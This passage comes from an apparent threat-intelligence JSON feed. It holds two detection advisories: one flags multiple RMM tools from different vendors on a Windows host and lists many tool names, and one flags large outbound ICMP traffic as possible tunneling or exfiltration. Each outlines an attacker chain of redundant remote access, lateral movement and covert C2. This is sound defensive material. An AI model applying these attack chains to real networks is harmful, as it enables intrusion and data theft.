Plus","MeshAgent","Mikogo","NinjaRMMAgent","NinjaRMMAgenPatcher","ninjarmm-cli","Parsec","Pulseway","Radmin","RealVNC","RemotePC","RemoteDesktopManager","RPCSuite","RustDesk","RemoteUtilities","Kaseya","ScreenConnect","Splashtop","Supremo","SyncroLive","TacticalRMM","Tailscale","TeamViewer","Tiflux","ToDesk","Twingate","TightVNC","UltraVNC","UltraViewer","AnyAssist","Velociraptor","ToolsIQ","ZohoAssist"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","rmm","windows","threat-detection"],"_cs_type":"advisory","_cs_vendors":["AeroAdmin","AnyDesk","Atera","AweSun","APC","BeyondTrust","BarracudaRMM","Domotz","DWService","FleetDeck","GetScreen","GoTo","Impero","ISLOnline","JumpCloud","Level","LogMeIn","Lunixar","ManageEngine","MeshCentral","Mikogo","NinjaOne","Parsec","Pulseway","Radmin","RealVNC","RemotePC","Devolutions","RPCSuite","RustDesk","RemoteUtilities","Kaseya","ScreenConnect","Splashtop","Supremo","TacticalRMM","Tailscale","TeamViewer","Tiflux","ToDesk","Twingate","TightVNC","UltraVNC","UltraViewer","AnyAssist","Velociraptor","ToolsIQ","ZohoAssist"],"content_html":"\u003cp\u003eThis detection rule identifies Windows hosts running multiple remote monitoring and management (RMM) tools from different vendors within an eight-minute timeframe. While legitimate MSP environments may utilize multiple tools, this activity can also indicate malicious behavior, such as an attacker establishing redundant access to a compromised system. The rule maps various RMM processes to vendor labels, ensuring that multiple binaries from the same vendor do not inflate the count. The processes monitored include popular RMM tools like TeamViewer, AnyDesk, ScreenConnect, and many others. This rule is designed to detect suspicious activity within the environment and alert security teams to potential compromises. The timeframe is set to eight minutes to reduce false positives.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial Access: An attacker gains initial access to a Windows host, possibly through phishing or exploitation of a vulnerability.\u003c/li\u003e\n\u003cli\u003eTool Deployment: The attacker deploys an initial RMM tool for remote access and control.\u003c/li\u003e\n\u003cli\u003eSecondary Tool Deployment: The attacker deploys a second RMM tool from a different vendor to ensure redundant access in case the first tool is detected or removed.\u003c/li\u003e\n\u003cli\u003ePrivilege Escalation: The attacker escalates privileges to gain SYSTEM or Administrator rights, if necessary, to maintain persistent access and control.\u003c/li\u003e\n\u003cli\u003eLateral Movement: The attacker uses the RMM tools to move laterally within the network to access additional systems and data.\u003c/li\u003e\n\u003cli\u003eData Exfiltration/Malicious Activity: The attacker uses the established RMM connections to exfiltrate sensitive data or perform other malicious activities such as deploying ransomware.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to unauthorized access to sensitive systems and data, potentially resulting in data breaches, financial loss, and reputational damage. This detection rule helps identify hosts that might be compromised by malicious actors utilizing multiple RMM tools for command and control. Identifying potentially compromised systems is key to preventing widespread damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rules in this brief to your SIEM to detect multiple RMM tools running on the same host within an eight-minute window.\u003c/li\u003e\n\u003cli\u003eInvestigate systems triggering this alert by reviewing process execution logs and network connections to identify the source of the RMM tool installation.\u003c/li\u003e\n\u003cli\u003eEnforce a policy of a single approved RMM stack per asset class to minimize the risk of unauthorized RMM tool usage.\u003c/li\u003e\n\u003cli\u003eTune the provided Sigma rules with host or organizational unit exceptions for legitimate MSP/IT tooling environments.\u003c/li\u003e\n\u003cli\u003eReview asset inventory and change tickets for approved RMM software to identify unauthorized installations.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-02-multiple-rmm-vendors/","summary":"This detection identifies a Windows host where two or more distinct remote monitoring and management (RMM) or remote-access tool vendors are observed starting processes within the same eight-minute window, potentially indicating compromise, shadow IT, or attacker staging of redundant access.","title":"Multiple Remote Management Tool Vendors on Same Host","url":"https://feed.craftedsignal.io/briefs/2024-01-02-multiple-rmm-vendors/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Splunk Enterprise","Splunk Enterprise Security","Splunk Cloud","Cisco Secure Access Firewall","Palo Alto Network Traffic"],"_cs_severities":["medium"],"_cs_tags":["network-traffic","command-and-control","data-exfiltration"],"_cs_type":"advisory","_cs_vendors":["Splunk","Cisco","Palo Alto"],"content_html":"\u003cp\u003eThis detection focuses on identifying anomalous ICMP (Internet Control Message Protocol) traffic indicative of malicious activity. ICMP is typically used for network diagnostics but can be abused for covert communication, data exfiltration, or command-and-control (C2) by threat actors. This analytic identifies ICMP traffic exceeding 1,000 bytes directed toward external IP addresses, filtering out internal networks. The detection logic leverages the Network_Traffic data model. Validated malicious instances may signal ICMP tunneling, unauthorized data transfer, or compromised endpoints. The data sources for this analytic include Palo Alto Network Traffic and Cisco Secure Access Firewall logs.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker compromises a host within the network.\u003c/li\u003e\n\u003cli\u003eThe compromised host initiates ICMP traffic to an external IP address.\u003c/li\u003e\n\u003cli\u003eThe ICMP traffic exceeds 1000 bytes, evading default network monitoring thresholds.\u003c/li\u003e\n\u003cli\u003eThe attacker uses ICMP to tunnel data, bypassing normal data transfer protocols.\u003c/li\u003e\n\u003cli\u003eThe compromised host uses ICMP for command and control, receiving instructions from the external attacker.\u003c/li\u003e\n\u003cli\u003eThe attacker establishes a covert communication channel using ICMP, masking their activity within normal network traffic.\u003c/li\u003e\n\u003cli\u003eSensitive data is exfiltrated via ICMP packets to the attacker-controlled external server.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation through large ICMP traffic can lead to data breaches, unauthorized access to internal resources, and the establishment of persistent command and control within the network. ICMP tunneling can bypass traditional security measures, allowing attackers to operate undetected. The impact of successful exploitation includes the potential compromise of sensitive data, disruption of network services, and financial loss.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Large ICMP Traffic\u003c/code\u003e to your SIEM and tune the byte threshold (currently 1000 bytes) based on your network baseline to minimize false positives.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the \u003ccode\u003eDetect Large ICMP Traffic\u003c/code\u003e rule, focusing on the source and destination IPs involved.\u003c/li\u003e\n\u003cli\u003eExamine network traffic logs for patterns indicative of ICMP tunneling or covert communication channels, using the provided data sources.\u003c/li\u003e\n\u003cli\u003eUtilize the provided search \u003ccode\u003eView the detection results\u003c/code\u003e to review related events and potential lateral movement.\u003c/li\u003e\n\u003cli\u003eImplement the provided search \u003ccode\u003eView risk events\u003c/code\u003e to look at risk factors for the involved assets.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T10:00:00Z","date_published":"2024-01-02T10:00:00Z","id":"/briefs/2024-01-large-icmp-traffic/","summary":"This analytic identifies excessive ICMP traffic to external IP addresses exceeding 1,000 bytes, potentially indicating command and control activity, data exfiltration, or covert communication channels.","title":"Large ICMP Traffic Detection","url":"https://feed.craftedsignal.io/briefs/2024-01-large-icmp-traffic/"}],"language":"en","title":"CraftedSignal Threat Feed — Command and Control","version":"https://jsonfeed.org/version/1.1"}